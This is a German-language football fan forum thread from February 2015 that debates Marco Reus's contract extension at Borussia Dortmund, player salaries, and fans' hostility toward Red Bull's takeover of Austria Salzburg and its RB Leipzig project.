Nicht dass ich gewollt hätte dass er nach München kommt, aber dachte schon dass er Spanien bevorzugen würde.
Barca wäre ja angeblich interessiert gewesen und darf ja auch "bald" wieder
Naja bei Barca hat ER angeblich abgesagt.
Sollte so gewesen sein.
Leute wo spiel ich bei euch wenn Neymar, Messi und Suarez da sind.
Antwort blieb man ihm indirekt schuldig und so hat er sich entschieden NICHT dorthin zu wechseln.
(wenn es denn stimmt)
Real will ihn aber angeblich noch haben, aber ob es dort soviel besser ist. Nunja wenn man Bale wirklich verkauft dann ja. Aber Bale will angeblich auch dort bleiben.
Insofern wohin sonst? Englische Liga? Hmmmm. ich glaub da hat er einige Beispiele die ihn nicht grad begeistert haben. Klar ist es ein anderer Faktor, aber Schürrle als Beispiel ist da wohl kein Vorbild.
Die Bayern haben von sich aus angeblich das Thema beendet.
Aber ob das alles so stimmt. ?????
Das wäre in der Tat ein Hammer!
Nicht dass ich gewollt hätte dass er nach München kommt, aber dachte schon dass er Spanien bevorzugen würde.
Barca wäre ja angeblich interessiert gewesen und darf ja auch "bald" wieder
Barca war seit langem unwahrscheinlich(Transfersperre (http://www.sportschau.de/fussball/international/transfersperre-gegen-barca-bestaetigt100.html)), eher Real, Bayern, Chelsea und City...
Stiffler
09.02.2015, 19:09
Barca war seit langem unwahrscheinlich(Transfersperre (http://www.sportschau.de/fussball/international/transfersperre-gegen-barca-bestaetigt100.html)), eher Real, Bayern, Chelsea und City...
Nun sind wir mal gespannt wie es kommt.
Ich hoffe nciht dass es wegen erwähnter Transfersperre einfach nur 1 Jahr länger ist weil er eben doch zu Barce möchte - das wäre echt bitter.
Andrerseits kann man so vielleicht mehr Geld bekommen, wäre aber wiederrum doof von Reus, ist ja sien Handgeld im Endeffekt...
terminator85
09.02.2015, 20:10
weil es gibt Leute die haben Ihre Feindbilder die Sie sich malen ;-)
Soll ich auch so richtig in die Diskussion mit einsteigen??? :noidea:
...Aber finds schön, wenn auch mal andere das eine oder andere ausformulieren. ;-)
Da schaut man 3 Tage ned ins Spiel und dann so eine hochinteressante Diskussion! :shock:
Vorerst nur mal kurz, weil alles hab ich noch ned gelesen: Dieser Satz von Mane betrifft wohl viele Probleme/Streitigkeiten, die im Fussball unter Fans ausgetragen werden.
Mir fehlt oft die Selbstreflexion, vorallem bei den eingefleischten Fans. In der Regel ist alles, was andere Vereine machen schlecht, verwerflich und dergleichen.
Über den Intimfeind oder Lokalrivalen wird sowieso nur negativ geredet, usw.
Ich zB war noch nie für ManCity. Kannte aber, um ehrlich zu sein, nicht ihre langjährige Vergangenheit
...und die Einkaufsaktionen (vom Russen) haben meine Einstellung zu dieser Mannschaft von "mir egal" auf "eigentlich mag ich dieses Team nicht" umschlagen lassen.
In England gefallen mir ManU, Liverpool und Arsenal am besten (genauer will ichs gar ned unterscheiden), weil mir die Philosophie (langjährige Teammanager/Trainer) gefällt und sie damit auch noch erfolgreich waren über Jahrzehnte. Wären sie ned erfolgreich gewesen, hätte ich in meiner Kindheit ja nix von ihnen mitbekommen.
...und wie ich die Situation in Ö und D sehe, schreib ich später vielleicht mal!?!
Da wirds erst so richtig kompliziert und spannend, wie man an eurer Diskussion sieht, weil da deutlich mehr Emotionen von euch involviert sind.
PS: Die Nazivergleiche mag ich überhaupt nicht!
Erstens wird diese Keule (ohne richtige Argumente) in den unpassensten Situationen ausgepackt. Da kann der Angegriffene ja nur ausrasten bzw die Medien nur aufschreien.
Zweitens sollte jeder gebildete Mensch wissen was es bedeutet und damit will, zumindest ich, nix zu tun haben.
=> Für mich fällt jeder unpassende Gebrauch dieser Rhetorik unter Wiederbetätigung.
=> Ich würde es sehr begrüßen, wenn so eine Provokation einfach mal unkommentiert ignoriert wird. Damit der Schwachsinn endlich mal endet.
Schön langsam wirds fad, wenn sowas kommt, weil jemanden die Argumente ausgehen, oder? Billiger gehts mMn wirklich ned Aufmerksamkeit zu erhaschen. LEIDER!!!
PPS: Dass es ausgerechnet bei Aue passiert ist (mit ihren violetten Trikots), ist, wenn man an die Situation in Salzburg denkt, erst recht ""komisch"". :roll:
shadow08
09.02.2015, 21:12
Soll ich auch so richtig in die Diskussion mit einsteigen??? :noidea:
Dafür bist ja fast schon zu spät. :)
...Aber finds schön, wenn auch mal andere das eine oder andere ausformulieren. ;-)
Da schaut man 3 Tage ned ins Spiel und dann so eine hochinteressante Diskussion! :shock:
Vorerst nur mal kurz, weil alles hab ich noch ned gelesen: Dieser Satz von Mane betrifft wohl viele Probleme/Streitigkeiten, die im Fussball unter Fans ausgetragen werden.
Mir fehlt oft die Selbstreflexion, vorallem bei den eingefleischten Fans. In der Regel ist alles, was andere Vereine machen schlecht, verwerflich und dergleichen.
Über den Intimfeind oder Lokalrivalen wird sowieso nur negativ geredet, usw.
Ich zB war noch nie für ManCity. Kannte aber, um ehrlich zu sein, nicht ihre langjährige Vergangenheit
...und die Einkaufsaktionen (vom Russen) haben meine Einstellung zu dieser Mannschaft von "mir egal" auf "eigentlich mag ich dieses Team nicht" umschlagen lassen.
In England gefallen mir ManU, Liverpool und Arsenal am besten (genauer will ichs gar ned unterscheiden), weil mir die Philosophie (langjährige Teammanager/Trainer) gefällt und sie damit auch noch erfolgreich waren über Jahrzehnte. Wären sie ned erfolgreich gewesen, hätte ich in meiner Kindheit ja nix von ihnen mitbekommen.
...und wie ich die Situation in Ö und D sehe, schreib ich später vielleicht mal!?!
Da wirds erst so richtig kompliziert und spannend, wie man an eurer Diskussion sieht, weil da deutlich mehr Emotionen von euch involviert sind.
PS: Die Nazivergleiche mag ich überhaupt nicht!
Erstens wird diese Keule (ohne richtige Argumente) in den unpassensten Situationen ausgepackt. Da kann der Angegriffene ja nur ausrasten bzw die Medien nur aufschreien.
Zweitens sollte jeder gebildete Mensch wissen was es bedeutet und damit will, zumindest ich, nix zu tun haben.
=> Für mich fällt jeder unpassende Gebrauch dieser Rhetorik unter Wiederbetätigung.
=> Ich würde es sehr begrüßen, wenn so eine Provokation einfach mal unkommentiert ignoriert wird. Damit der Schwachsinn endlich mal endet.
Schön langsam wirds fad, wenn sowas kommt, weil jemanden die Argumente ausgehen, oder? Billiger gehts mMn wirklich ned Aufmerksamkeit zu erhaschen. LEIDER!!!
PPS: Dass es ausgerechnet bei Aue passiert ist (mit ihren violetten Trikots), ist, wenn man an die Situation in Salzburg denkt, erst recht ""komisch"". :roll:
Zu dem Roten, die Angesprochenen sollten sich einfach mal Gedanken machen und die Medien sollten sich ned immer in die Hosen machen. Was damals passierte war tragisch, aber wird in der Form nicht mehr stattfinden, also muss man nicht immer gleich Panik schieben wenn man dieses Thema aufgreift. (Das geht jetzt nicht an uns hier im Forum sondern die Medien und alle die immer gleich komplett entsetzt sind)
Ich seh das Thema vielleicht ned ganz so drastisch wie die Meisten, weil ich auch versuche die andere Seite zu verstehen und das versuchen RB-Fans sicher nicht.
Warum bringt man solche extremen Provokationen?
Mir fällt jetzt grad nicht ein wann ich zuletzt diese Uniform mit einem falschen Kopf drauf gesehen habe, aber für mich zeigt das einfach wie sehr man RB hasst dann man es sogar mit sowas in Verbindung bringt um eben zu zeigen wie sehr man sie verabscheut.
terminator85
09.02.2015, 22:03
Dafür bist ja fast schon zu spät. :)
Zu dem Roten, die Angesprochenen sollten sich einfach mal Gedanken machen und die Medien sollten sich ned immer in die Hosen machen. Was damals passierte war tragisch, aber wird in der Form nicht mehr stattfinden, also muss man nicht immer gleich Panik schieben wenn man dieses Thema aufgreift. (Das geht jetzt nicht an uns hier im Forum sondern die Medien und alle die immer gleich komplett entsetzt sind)
Ich seh das Thema vielleicht ned ganz so drastisch wie die Meisten, weil ich auch versuche die andere Seite zu verstehen und das versuchen RB-Fans sicher nicht.
Warum bringt man solche extremen Provokationen?
Mir fällt jetzt grad nicht ein wann ich zuletzt diese Uniform mit einem falschen Kopf drauf gesehen habe, aber für mich zeigt das einfach wie sehr man RB hasst dann man es sogar mit sowas in Verbindung bringt um eben zu zeigen wie sehr man sie verabscheut.
Naja, ein paar provokante (und bisher unveröffentlichte) Sachen hätte ich schon noch auf Lager, damit die Diskussion wieder ordentlich angefacht wird. ;-)
Ich bin trotzdem eher ein Fan davon positive Bilder über den Sport zu transportieren.
Da sind zB die Bilder des Papstes als 12.Mann! Egal was man von der katholischen Kirche halten mag. Der Papst (als Fussballbegeisterter Mensch) oder der Dalai Lama sind so ziemlich die einzigen 2 Personen, die weltweit Anerkennung haben. Sie versuchen ihr Ansehen für den Weltfrieden einzusetzen. Wenn von den Fans sowas rausgetragen wird (mit all dem nötigen Augenzwinkern), find ichs eine gelungene Sache.
Noch besser finde ich die Tradition, dass jedes Ö-BuLi-Team einen, von den Fans ausgesuchten, Simpson-Charakter hat, der für sie steht! Das sind Fanaktionen, wo man endlich mal lockerer und spassiger mit dem Thema Fantreue umgeht.
@Alex: Egal was RB macht! Es ist einfach ned vergleichbar mit dem ganzen Zeug, was beim 2.Weltkrieg passiert ist. Das ist ein ganz anderes Thema und total schwer irgendwas gemeinsames zu finden.
Mir fällt nur eine Sache ein: Die einzige Gemeinsamkeit ist, dass es immer für die ""gute Sache"" war. :evil:
...Aber RedBull und Mateschitz sind im Vergleich total harmlos, sonst wärens schon längst D-Meister geworden! ;-):-P Vergiß das nicht!!!
Alex, es geht da nicht nur um die RB-Fans, die sind an dem ganzen Konflikt mMn ziemlich wenig beteiligt. Oder?
Medien, Management und Vermarktung machen deutlich mehr Blödsinn bei dem Thema.
Beide (Fan-)Seiten sehen eben immer nur das negative beim anderen Verein, dabei ist nicht alles nur negativ.
...Ich glaub, ich muss bei dem Thema wirklich mal weiter ausholen...:roll:
PS: Mich hats auch sowas von geärgert als RB in Salzburg den Laden übernommen hat und keinen Weg gefunden hat, gemeinsam etwas wirklich erfolgreiches drauß zu machen.
Der Kommerz ist aus dem Profifussball LEIDER gar nicht mehr wegzudenken!!!
shadow08
09.02.2015, 22:19
Ich vergleichs auch nicht 1zu1 miteinander. Habs eh schon mal geschrieben so in die Richtung: Was damals passiert ist war in dem Bereich das Schlimmste und das was RB abzieht ist für viele im Fussball das Schlimmste. Es soll also nur darstellen wie schlimm es aufgefasst werden kann.
Da gibts für mich persönlich kein schönreden. Das negative überwiegt einfach, da zählen die tollen Arbeitsplätze oder was sie sonst noch schaffen nicht. Wenn sich RB aus Ö verabschiedet würd ich ihnen zum Abschied sogar noch einen A...tritt mitverpassen damit sie ja ned wieder zurückkommen. :)
Man kann auch RB in Ö und in D nicht ganz vergleichen, weil sie in D eigentlich noch ned so viel verwerfliches gemacht haben, aber die Fans in Salzburg bekommen die Rechnung eh bald präsentiert bin schon gespannt wie blöd die schauen wenns bald soweit ist dass nur noch Leipzig wichtig ist und sie in Salzburg dann nur noch ein Jugendteam haben das vielleicht in der Liga noch mitspielen kann weils junge Talente sein werden, aber Internationale Spiele könnens dann wohl auch vergessen. :)
Zu den Fans naja wieso sollten die nicht schuld sein? Sie unterstützen das alles und reden davon wie toll es nicht alles ist.
Wenn ich mir diverse Kommentare von RB-Fans anschaue dann verleiht RB keine Flügel sondern Naivität und Dummheit. :)
Alle will ich aber damit nicht in einen Topf werfen, ein paar normale werdens ja hoffentlich auch haben. :)
Stiffler
09.02.2015, 23:43
Genau darum gehts mir aber.
Millionen investieren und Stars holen wäre so wie bei Chelsea usw.
Mich stört aber genau das Andere. Ein Verein wurde ausgelöscht fürs eigene Projekt (stand selbst auf deren Homepage damals dass sie ein komplett neuer Verein sind und sich von Austria Salzburg distanzieren), später wollten sie sich dann doch die Austria Salzburg Titel unter den Erfolgen reinschreiben. Regeln umgehen und lauter so Aktionen, dafür kann es keinen Respekt geben.
Was will man denn sagen 'Hey ihr seids super ihr habts eine minimale Lücke in den Regeln gefunden und die beinhart ausgenutzt und allen auf den Kopf geschissen und euch dadurch enorme Vorteile geholt, weiter so' ? echt jetz?
Man muss RB ned hassen, da bin ich halt extrem beeinflusst, aber alles schön reden was sie machen braucht man auch ned.
Sponsoren im Namen sind doch in Österreich die völlige Normalität?
Hab mich mal ein wenig informiert, Salzburg hieß schon:
Gerngross Salzburg
Sparkassa Salzburg
Casino Salzburg
Wüstenrot Salzburg
und nun Red Bull
Salopp formuliert wollte der nette Herr mit den vielen Millionen und der Vision professionellen Fussball in Salzburg spielen zu lassen auch ein wenig davon partizipieren. Nur die Hand aufhalten funktioniert nicht mal mehr im Fussball. Die Leute wollen erfolgreichen, spektakulären Fussball - den gibts nicht umsonst.
Sehr viele Investoren, Präsidenten und Visionäre haben in Salzburg immer nur eines ganz bestimmt erreicht auf Dauer: Pleiteteams und einen Schuldenklub!
Dieser Tatsache muss man einfach auch mal ins Auge sehen Alex!
Deinen Absatz
so populistisch er klingen mag, kann ich nicht viel abgewinnen.
Ich höre nämlich niemanden obiges sagen, ich lese aber sehr oft das Gegenteil!
Dass du da beeinflusst zu sein scheinst hättest nicht unbedingt ansprechen müssen, das klang vielleicht zwischendurch mal raus :)
Und alles, Betonung auf "alles", muss man sicher nicht gut finden. Ich bin da auch ein Stück bei Dir, keine Frage (Stichwort TSV Borussia RB München in Blau-Gelben Trikots :boom:)
Sie bieten Spektakel, mit dem Weg den sie gehen provozieren sie. Sie geben daher neben Profifussball in Salzburg auch eine Menge zurück. Sie tragen z.B. sehr viel dazu bei, dass Fans anderer Vereine ihre Traditionen wahren und sich auf diese besinnen.
Und dies genau so lange
bis diese Klubs auch irgendwann in der Bedeutungslosikeit verschwinden und die Ehemaligen schunkelnd singen:
♫ Wo ist denn der Held, der mit seinem Geld ♫ die Runden bestellt ♫
die Nachkömmlinge sich Vereine in England suchen oder gar für anderen Sport zu interessieren beginnen
Fans sich jemanden wünschen der doch ein wenig Geld in die Hand genommen hätte das frühere ein wenig zu erhalten. Gerne hätten sie auf ein wenig Farbe verzichtet oder wären Kompromisse eingegangen.
Mateschitz also der moderne Antiheld? Jawoll rufe ich, feiert ihn - ohne Scheiß! ;-)
Dass er dabei verdienen möchte, wer nimmts ihn übel?
Ich renn täglich zur Arbeit, ich dreckiger Kapitalist
Kuck mal in Deutschlands dritten Ligen, da hast 12 oder 13 Vereine die mal Erstklassig waren und 3 "zweite Mannschaften"
Selbst in den Regionalligen findest noch über 10 Ehemalige in den 5 Ligen...
Gerne würden die das Geld von Herrn Mateschitz nehmen.
Die Städte, die Gemeinden, die Anwohner, die Fans. Gerne würden sich die Kinder ein wenig mehr mit Ihrer Heimat identifizieren und einen großen Klub Willkommen heißen.
Die Kommunen würden sich über Profifussball mancherorts freuen, den Arbeitslosenzahlen täte es gut.
In Salzburg aber muss sich keiner fragen weshalb
Ried mit 11k
Altach mit 6k
Grödig mit 7k
Einwohner erste Liga spielt und das große Salzburg mit 150k Einwohnern nur zusieht.
Und bald muss sich auch in Leipzig niemand mehr fragen weshalb Freiburg, Augsburg, Mainz und Paderborn erste Liga spielen während Leipzig nur zusehen durfte....
shadow08
10.02.2015, 11:10
Sponsoren im Namen sind doch in Österreich die völlige Normalität?
Ja leider.
Hab mich mal ein wenig informiert, Salzburg hieß schon:
Gerngross Salzburg
Sparkassa Salzburg
Casino Salzburg
Wüstenrot Salzburg
und nun Red Bull
Salopp formuliert wollte der nette Herr mit den vielen Millionen und der Vision professionellen Fussball in Salzburg spielen zu lassen auch ein wenig davon partizipieren. Nur die Hand aufhalten funktioniert nicht mal mehr im Fussball. Die Leute wollen erfolgreichen, spektakulären Fussball - den gibts nicht umsonst.
Sehr viele Investoren, Präsidenten und Visionäre haben in Salzburg immer nur eines ganz bestimmt erreicht auf Dauer: Pleiteteams und einen Schuldenklub!
Dieser Tatsache muss man einfach auch mal ins Auge sehen Alex!
Ich hab auch nie was gegenteiliges behauptet. Mir ist klar dass wir damals finanziell am Ende waren und es nicht viele Optionen gab. Vielen würden wahrscheinlich genauso handeln, ich persönlich habe dazu eine andere Einstellung. Mein Verein wurde damals ausgelöscht, also wäre mir alles lieber gewesen als das. Pleite gehen und neu anfangen von unten wäre für mich ok gewesen, nichts anderes haben wir jetzt ohnehin gemacht.
Mich würd ja interessieren was du machen würdest wenn die Bayern in der Situation wären, verspekuliert... Pleite... RB übernimmt und ändert alles nach belieben... holen sich dann noch ein spanisches Team das wird dann das Hauptteam und dein RB Münschen wird zum Farmteam mit nur noch jungen Talenten.... Viel Spaß mit dem Gedanken. :lol::lol::lol:
Deinen Absatz
so populistisch er klingen mag, kann ich nicht viel abgewinnen.
Ich höre nämlich niemanden obiges sagen, ich lese aber sehr oft das Gegenteil!
Weil es kaum einer lesen würde wenn die Medien schreiben würden wie toll alles ist. Genügt schon das die Fans es so sehen.
Dass du da beeinflusst zu sein scheinst hättest nicht unbedingt ansprechen müssen, das klang vielleicht zwischendurch mal raus :)
Und alles, Betonung auf "alles", muss man sicher nicht gut finden. Ich bin da auch ein Stück bei Dir, keine Frage (Stichwort TSV Borussia RB München in Blau-Gelben Trikots :boom:)
Sie bieten Spektakel, mit dem Weg den sie gehen provozieren sie. Sie geben daher neben Profifussball in Salzburg auch eine Menge zurück. Sie tragen z.B. sehr viel dazu bei, dass Fans anderer Vereine ihre Traditionen wahren und sich auf diese besinnen.
Und dies genau so lange
bis diese Klubs auch irgendwann in der Bedeutungslosikeit verschwinden und die Ehemaligen schunkelnd singen:
♫ Wo ist denn der Held, der mit seinem Geld ♫ die Runden bestellt ♫
die Nachkömmlinge sich Vereine in England suchen oder gar für anderen Sport zu interessieren beginnen
Fans sich jemanden wünschen der doch ein wenig Geld in die Hand genommen hätte das frühere ein wenig zu erhalten. Gerne hätten sie auf ein wenig Farbe verzichtet oder wären Kompromisse eingegangen.
Mateschitz also der moderne Antiheld? Jawoll rufe ich, feiert ihn - ohne Scheiß! ;-)
Dass er dabei verdienen möchte, wer nimmts ihn übel?
Ich renn täglich zur Arbeit, ich dreckiger Kapitalist
:shock: Echt jetz? Die 2 roten Sachen in einem Absatz? Geht für mich einfach gar ned. Grad er hätte es ned nötig um jeden Preis noch mehr Erfolg zu erringen denn er hat ohnehin schon mehr als genug erreicht. Im Fussball hätte er es durchaus auf die gute art versuchen können und auch ohne miesen Tricks.
Kuck mal in Deutschlands dritten Ligen, da hast 12 oder 13 Vereine die mal Erstklassig waren und 3 "zweite Mannschaften"
Selbst in den Regionalligen findest noch über 10 Ehemalige in den 5 Ligen...
Gerne würden die das Geld von Herrn Mateschitz nehmen.
Soll er doch machen, aber als SPONSOR mit bissl Mitspracherecht und mehr nicht und keinen Einfluss der Teams untereinander. Aber dann würde er ja dem Fussball was gutes tun und darum gehts ihm halt leider ned sondern nur um sein sch.... Produkt!
Die Städte, die Gemeinden, die Anwohner, die Fans. Gerne würden sich die Kinder ein wenig mehr mit Ihrer Heimat identifizieren und einen großen Klub Willkommen heißen.
Die Kommunen würden sich über Profifussball mancherorts freuen, den Arbeitslosenzahlen täte es gut.
Die Arbeitsplätze die geschaffen werden sind das einzig positive, aber selbst die kann er auch auf anderem Weg schaffen.
Stiffler
10.02.2015, 11:29
Ich hab auch nie was gegenteiliges behauptet. Mir ist klar dass wir damals finanziell am Ende waren und es nicht viele Optionen gab. Vielen würden wahrscheinlich genauso handeln, ich persönlich habe dazu eine andere Einstellung. Mein Verein wurde damals ausgelöscht, also wäre mir alles lieber gewesen als das. Pleite gehen und neu anfangen von unten wäre für mich ok gewesen, nichts anderes haben wir jetzt ohnehin gemacht.
Mich würd ja interessieren was du machen würdest wenn die Bayern in der Situation wären, verspekuliert... Pleite... RB übernimmt und ändert alles nach belieben... holen sich dann noch ein spanisches Team das wird dann das Hauptteam und dein RB Münschen wird zum Farmteam mit nur noch jungen Talenten.... Viel Spaß mit dem Gedanken. :lol::lol::lol:
Vielleicht fällt es mir tatsächlich leicht ein anderes, ein weniger dramatisches Urteil als du zu fällen da ich
a) nicht betroffen bin und
b) sehr wahrscheinlich nie betroffen sein werde
Bleibt die Option die Möglichkeiten zu erkennen die sich trotz allem bieten, hatten wir aber schon.
Weil es kaum einer lesen würde wenn die Medien schreiben würden wie toll alles ist. Genügt schon das die Fans es so sehen.
Das ist nun arg spekulativ
:shock: Echt jetz? Die 2 roten Sachen in einem Absatz? Geht für mich einfach gar ned. Grad er hätte es ned nötig um jeden Preis noch mehr Erfolg zu erringen denn er hat ohnehin schon mehr als genug erreicht. Im Fussball hätte er es durchaus auf die gute art versuchen können und auch ohne miesen Tricks.
Ja, echt jetzt. Der versteht sein Geschäft wie kein Zweiter. Zum FC Bayern gibts seit fast 50 Jahren auch nur 2 Meinungen, entweder man feiert sie, oder man verachtet sie - eine klare Formel des Erfolgs.
Er bot Optionen, die wurden nicht akzeptiert. Gut, dann läufts trotzdem so wie er will.
Das was über allem steht - RB als Marke, partizipiert am meisten davon.
Vielleicht wird das irgendwann zugar verfilmt:
The Wolf of Austria, um die Hauptrolle prügeln sich Liev Schreiber und Leo die Caprio :noidea:
Soll er doch machen, aber als SPONSOR mit bissl Mitspracherecht und mehr nicht und keinen Einfluss der Teams untereinander. Aber dann würde er ja dem Fussball was gutes tun und darum gehts ihm halt leider ned sondern nur um sein sch.... Produkt!
mMn ein billiger Versuch durchs Hintertürchen Vorgänge wie bei Chelsea und Co zu billigen und die Abneigung gegen RB zu untermauern.
Da ist die persönliche Betroffenheit schon sehr viel akzeptabler.
Die Arbeitsplätze die geschaffen werden sind das einzig positive, aber selbst die kann er auch auf anderem Weg schaffen.
Sehr wohl korrekt. Mit Sozialeinrichtungen z.B. täte er sehr viel Gutes, könnte helfen, sein Geld sinnvoll einsetzen und würde auch Arbeit schaffen.
Das führt aber nun zu weit und wäre ebenfalls auf alle anderen anzuwenden ob sie Kamele besitzen, Gummienten verkaufen, Ölfelder besitzen oder Waffen besitzen und/ im Baugewerbe sind.
Guten Tag :yo:
shadow08
10.02.2015, 11:49
Vielleicht fällt es mir tatsächlich leicht ein anderes, ein weniger dramatisches Urteil als du zu fällen da ich
a) nicht betroffen bin und
b) sehr wahrscheinlich nie betroffen sein werde
Top :thumb:
Ich will keinem einreden RB genauso zu hassen wie ich es tue, sondern nur das auch verstanden wird warum es so ist und das es nicht um ein gemachtes Feindbild geht.
Bleibt die Option die Möglichkeiten zu erkennen die sich trotz allem bieten, hatten wir aber schon.
Das ist nun arg spekulativ
Ja, echt jetzt. Der versteht sein Geschäft wie kein Zweiter. Zum FC Bayern gibts seit fast 50 Jahren auch nur 2 Meinungen, entweder man feiert sie, oder man verachtet sie - eine klare Formel des Erfolgs.
Er bot Optionen, die wurden nicht akzeptiert. Gut, dann läufts trotzdem so wie er will.
Das was über allem steht - RB als Marke, partizipiert am meisten davon.
Vielleicht wird das irgendwann zugar verfilmt:
The Wolf of Austria, um die Hauptrolle prügeln sich Liev Schreiber und Leo die Caprio :noidea:
Hör auf sonst kommt wirklich noch wer auf so eine Idee! :lol:
The Life of Hitler.. ähhh Mateschitz :-P
sorry konnt ich mir ned verkneifen :lol:
mMn ein billiger Versuch durchs Hintertürchen Vorgänge wie bei Chelsea und Co zu billigen und die Abneigung gegen RB zu untermauern.
Da ist die persönliche Betroffenheit schon sehr viel akzeptabler.
Sehr wohl korrekt. Mit Sozialeinrichtungen z.B. täte er sehr viel Gutes, könnte helfen, sein Geld sinnvoll einsetzen und würde auch Arbeit schaffen.
Das führt aber nun zu weit und wäre ebenfalls auf alle anderen anzuwenden ob sie Kamele besitzen, Gummienten verkaufen, Ölfelder besitzen oder Waffen besitzen und/ im Baugewerbe sind.
Guten Tag :yo:
Das wär natürlich noch besser, aber schon fast zu viel verlangt. Ich meinte eh im Fussball-Bereich wäre einiges besser möglich gewesen.
Problem bei uns in Ö ist halt auch das keiner die Eier hat ihnen einen Riegel vor ihre Machenschaften zu setzen und wahrscheinlich schaffen sies sogar dass am Ende beide Teams (Salzburg & Leipzig) international spielen dürfen weil sich dort auch keiner den Mund aufmachen traut.
nun fix:
Reus bleibt bei Dortmund.
Auf FB hat er geschrieben:
Hallo Leute,
ich freue mich euch mitteilen zu können, dass ich meinen Vertrag bis 2019 verlängert habe!
Auf die Zukunft beim BVB mit unseren überragenden Fans im Rücken freue ich mich sehr.
Mein Herz hat entschieden, also packen wir es an, wir haben einiges vor nicht nur in dieser Saison!
Euer Marco
#HejaBV (https://www.facebook.com/hashtag/hejabv?source=feed_text&story_id=884491464905691) #MRXI (https://www.facebook.com/hashtag/mrxi?source=feed_text&story_id=884491464905691)
Mit Foto:
https://www.facebook.com/MarcoReus11/photos/pcb.884491464905691/884489658239205/?type=1&theater
sehr schön für den BVB ;-)
nun kommen andere Probleme auf den BVB zu :-?
Reus bekommt so um die 8 Mio !
Jetzt is dann spannend was da jetzt ein Hummels usw. denken oder wollen.
Naja ich habe keine Ahnung was andere so verdienen.
Aber dass der BVB keine kleinen Summen an ihre Spieler zahlen kann, ist doch wohl klar. Nur aus "wahrer Liebe" bleibt man auch nicht dort.
ein Hummels soll angeblich so 3 Mio habe ;-)
ohne Gewähr ;-)
http://fussball-geld.de/gehalt-der-bundesliga-borussia-dortmund/
Na prack. Doch relativ ein Quantensprung zu den 8 Mille jetzt.
Stiffler
10.02.2015, 17:03
Top :thumb:
Ich will keinem einreden RB genauso zu hassen wie ich es tue, sondern nur das auch verstanden wird warum es so ist und das es nicht um ein gemachtes Feindbild geht.
Könntest eh nicht - meine Meinung bilde ich mir schon selbst, auch wenn ich nach ordentlicher Argumentation durchaus bereit bin diese zu ändern sofern notwendig
Hör auf sonst kommt wirklich noch wer auf so eine Idee! :lol:
The Life of Hitler.. ähhh Mateschitz :-P
Meine Dose! :nod:
Machen wir schon das "Casting" für den Titel?
Stiffler
10.02.2015, 17:17
Definitiv interessant :nod:
War aber eine Frage der Zeit. Qualität kostet nun mal Geld.
Insofern ein richtiger Schritt, einem Kagawa, einem Sahin usw. wollte man dieses Geld nicht bezahlen und ließ sie ziehen - mit ordentlich Qualitätsverlust. Nun investiert man dieses Geld in Handgeld und Vertragsverlängerung.
Begrüße ich sehr, die Weichen für die zweite Kraft werden gestellt.
ein Hummels soll angeblich so 3 Mio habe ;-)
ohne Gewähr ;-)
http://fussball-geld.de/gehalt-der-bundesliga-borussia-dortmund/
Glaub nur etwa 5% von dieser Seite. Die raten sehr oft ins Blaue ;-)
Machen wir schon das "Casting" für den Titel?
Vorschläge sind herzlich Willkommen
Vielleicht dreh ich nen 8mm daraus :lol:
terminator85
10.02.2015, 17:40
Naja bei Barca hat ER angeblich abgesagt.
Sollte so gewesen sein.
Leute wo spiel ich bei euch wenn Neymar, Messi und Suarez da sind.
Antwort blieb man ihm indirekt schuldig und so hat er sich entschieden NICHT dorthin zu wechseln.
(wenn es denn stimmt)
Real will ihn aber angeblich noch haben, aber ob es dort soviel besser ist. Nunja wenn man Bale wirklich verkauft dann ja. Aber Bale will angeblich auch dort bleiben.
Insofern wohin sonst? Englische Liga? Hmmmm. ich glaub da hat er einige Beispiele die ihn nicht grad begeistert haben. Klar ist es ein anderer Faktor, aber Schürrle als Beispiel ist da wohl kein Vorbild.
Die Bayern haben von sich aus angeblich das Thema beendet.
nun fix:
Reus bleibt bei Dortmund.
Auf FB hat er geschrieben:
Hallo Leute,
ich freue mich euch mitteilen zu können, dass ich meinen Vertrag bis 2019 verlängert habe!
Auf die Zukunft beim BVB mit unseren überragenden Fans im Rücken freue ich mich sehr.
Mein Herz hat entschieden, also packen wir es an, wir haben einiges vor nicht nur in dieser Saison!
Euer Marco
#HejaBV (https://www.facebook.com/hashtag/hejabv?source=feed_text&story_id=884491464905691) #MRXI (https://www.facebook.com/hashtag/mrxi?source=feed_text&story_id=884491464905691)
Mit Foto:
https://www.facebook.com/MarcoReus11/photos/pcb.884491464905691/884489658239205/?type=1&theater
Reus ist mMn überbewertet (im Vergleich zu andere Spieler seiner Position) und außerdem auch noch zu verletzungsanfällig, um einem Team wirklich dauerhaft zu helfen.
=> Er lässt sich die eine (oder mehr) Saison ohne internationale Spiele durch ordentliches Gehalt entschädigen!
(Anmerkung: Wobei ich ihm damit nicht unterstellen will, dass er NUR aufs Geld schaut.)
Da, wie von joker gut zusammengefasst, eh keine attraktiven Adressen ihn haben wollen (samt Stammleiberlgarantie), ergibt sich dieser Vertrag beim BVB für ihn ganz gut.
btw: Bei den BVB-Fans punktet er -unsinnigerweise- bestimmt wieder ordentlich Lob für seine tolle Teamtreue! :roll:
Die Wahrheit ist irgendetwas dazwischen, aber von aussen nicht zu erkennen. ;-)
Ja, denke auch, dass es für den Verein nicht der beste Weg sein kann.
Hummels usw werden ähnliches einfordern oder, wie ich eh auch schon geschrieben hab, den Verein wechseln. Ohne -fixen- internationalen Startplatz solche Verträge unterzeichnen ist von Seiten des Vereins mMn ziemlich unverantwortbar. :shock:
In Ö könnte sich sowas kein Verein leisten ohne ca 2 Saisonen später in Konkurs gehen zu müssen (wie zB Tirol, GAK je knapp nach dem Meistertitel). Selbst Sturm hat an den überteuerten Verträge nach der erfolgreichen CL-Zeit finanziell dran geknabbert.
=> Gesundschrumpfen ODER Erfolg halten, muss die Devise sein!
...ABER passieren tut meist was anderes. Teure Spielerverträge haben, gute Spiele ohne Ablöse ziehen lassen müssen und sportlich doch wieder nur gutes Mittelmass in der Liga sein.
...und was es für Austria Salzburg bedeutet hat, wurde eh schon ausführlich geschrieben. Da wars ein Supergau, der noch ewig nachschwingt und wohl nie restlos geklärt wird. :-(
=> Die "Katerjahre" nach dem großen Erfolg kommen für den BVB erst noch, nachdem sich die Euphorie schön langsam legt.
Definitiv interessant :nod:
War aber eine Frage der Zeit. Qualität kostet nun mal Geld.
Insofern ein richtiger Schritt, einem Kagawa, einem Sahin usw. wollte man dieses Geld nicht bezahlen und ließ sie ziehen - mit ordentlich Qualitätsverlust. Nun investiert man dieses Geld in Handgeld und Vertragsverlängerung.
Begrüße ich sehr, die Weichen für die zweite Kraft werden gestellt.
